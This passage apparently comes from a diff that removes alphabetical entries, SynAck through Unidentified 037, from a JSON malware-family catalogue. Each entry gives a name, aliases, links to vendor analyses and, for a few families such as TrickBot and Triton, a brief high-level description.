"https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" - ] - }, - "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", - "value": "SynAck", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", - "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" - ] - }, - "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", - "value": "SyncCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", - "value": "SynFlooder", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" - ] - }, - "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", - "value": 
"Synth Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", - "value": "Sys10", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", - "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", - "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" - ] - }, - "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", - "value": "Syscon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - }, - "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", - "value": "SysGet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" - ] - }, - "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", - "value": "SysScan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", - "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", - "https://www.secureworks.com/research/srizbi", - "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" - ] - }, - "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", - "value": "Szribi", - "description": "" 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", - "value": "TabMsgSQL", - "description": "" - }, - { - "meta": { - "synonyms": [ - "simbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" - ] - }, - "uuid": "94323b32-9566-450b-8480-5f9f53b57948", - "value": "taidoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" - ] - }, - "uuid": "b0467c03-824f-4071-8668-f056110d2a50", - "value": "Taleret", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" - ] - }, - "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", - "value": "Tandfuy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", - "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" - ] - }, - "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", - "value": "Tapaoux", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", - 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", - "value": "Tarsip", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" - ] - }, - "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", - "value": "tDiscoverer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", - "http://www.clearskysec.com/tulip/" - ] - }, - "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", - "value": "TDTESS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - }, - "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", - "value": "TeleBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", - "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", - "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" - ] - }, - "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", - "value": "TeleDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" - ] - }, - "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", - "value": "Tempedreve", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Fakem RAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", - 
"https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", - "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", - "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] - }, - "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", - "value": "Terminator RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "cryptesla" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", - "https://blogs.cisco.com/security/talos/teslacrypt", - "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", - "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", - "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", - "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" - ] - }, - "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", - "value": "TeslaCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Alphabot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", - "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" - ] - }, - "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", - "value": "Thanatos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", - 
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", - "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" - ] - }, - "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", - "value": "Thanatos Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - }, - "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", - "value": "ThreeByte", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - }, - "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", - "value": "ThumbThief", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" - ] - }, - "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", - "value": "Thunker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", - "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" - ] - }, - "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", - "value": "Tidepool", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Zusy", - "TinyBanker", - "Illi" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", - 
"http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", - "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", - "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", - "http://garage4hackers.com/entry.php?b=3086", - "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", - "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", - "http://contagiodump.blogspot.com/2012/06/amazon.html", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" - ] - }, - "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", - "value": "Tinba", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", - "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" - ] - }, - "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", - "value": "TinyLoader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "NukeBot", - "Nuclear Bot", - "MicroBankingTrojan", - "Xbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", - "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", - "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", - "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", - 
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", - "https://krebsonsecurity.com/tag/nuclear-bot/" - ] - }, - "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", - "value": "TinyNuke", - "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" - ] - }, - "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", - "value": "TinyTyphon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", - "value": "TinyZbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" - ] - }, - "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", - "value": "Tiop", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Gheg" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", - 
"https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", - "https://www.cert.pl/en/news/single/tofsee-en/", - "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" - ] - }, - "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", - "value": "Tofsee", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", - "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", - "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" - ] - }, - "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", - "value": "TorrentLocker", - "description": "" - }, - { - "meta": { - "synonyms": [ - "huntpos" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", - "http://adelmas.com/blog/treasurehunter.php", - "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", - "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" - ] - }, - "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", - "value": "TreasureHunter", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Trickster", - "TheTrick", - "TrickLoader" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", - "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", - "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", - "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", - "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", - 
"https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", - "https://www.youtube.com/watch?v=KMcSAlS9zGE", - "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", - "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", - "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", - "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", - "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", - "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", - "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", - "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", - "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", - "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "http://www.malware-traffic-analysis.net/2018/02/01/", - "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", - 
"http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", - "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", - "https://www.youtube.com/watch?v=EdchPEHnohw", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://www.youtube.com/watch?v=lTywPmZEU1A", - "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", - "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", - "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" - ] - }, - "uuid": "c824813c-9c79-4917-829a-af72529e8329", - "value": "TrickBot", - "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. 
Phish > Attached MS Office > Marco enabled > Trickbot installed" - }, - { - "meta": { - "synonyms": [ - "Trisis", - "HatMan" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://dragos.com/blog/trisis/TRISIS-01.pdf", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", - "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" - ] - }, - "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", - "value": "win.triton", - "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/5loyd/trochilus/" - ] - }, - "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", - "value": "Trochilus RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Shade" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] - }, - "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", - "value": "Troldesh", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" - ] - }, - "uuid": 
"48deadcc-1a67-442d-b181-fdaaa337c4bb", - "value": "Trump Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" - ] - }, - "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", - "value": "Tsifiri", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - }, - "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", - "value": "TURNEDUP", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", - "https://www.lastline.com/labsblog/tyupkin-atm-malware/" - ] - }, - "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", - "value": "Tyupkin", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Akagi" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", - "https://github.com/hfiref0x/UACME" - ] - }, - "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", - "value": "UACMe", - "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", - "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns", - "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" - ] - }, - "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", - "value": "UDPoS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", - "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" - ] - }, - "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", - "value": "Uiwix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" - ] - }, - "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", - "value": "Unidentified 001", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" - ] - }, - "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", - "value": "Unidentified 003", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" - ] - }, - "uuid": "", - "value": "", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" - ] - }, - "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", - "value": "Unidentified 006", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", - "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" - ] - }, - "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", - "value": "Unidentified 013 (Korean)", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", - "https://wikileaks.org/ciav7p1/cms/page_34308128.html" - ] - }, - "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", - "value": "Unidentified 020 (Vault7)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" - ] - }, - "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", - "value": "Unidentified 022 (Ransom)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" - ] - }, - "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", - "value": "Unidentified 023", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", - "https://twitter.com/malwrhunterteam/status/789161704106127360" - ] - }, - "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", - "value": "Unidentified 024 (Ransomware)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", - "http://malware-traffic-analysis.net/2016/05/09/index.html" - ] - }, - "uuid": "f43a0e38-2394-4538-a123-4a0457096058", - "value": "Unidentified 025 (Clickfraud)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" - ] - }, - "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", - "value": "Unidentified 028", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" - ] - }, - "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", - "value": 
"Unidentified 029", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", - "https://twitter.com/JaromirHorejsi/status/877811773826641920" - ] - }, - "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", - "value": "Filecoder", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" - ] - }, - "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", - "value": "Unidentified 031", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" - ] - }, - "uuid": "799921d7-48e8-47a6-989e-487b527af37a", - "value": "Unidentified 032", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ] - }, - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034", - "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" - ] - }, - "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", - "value": "Unidentified 034", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" - ] - }, - "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", - "value": "Unidentified 035", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" - ] - }, - "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", - "value": "Unidentified 037", - 
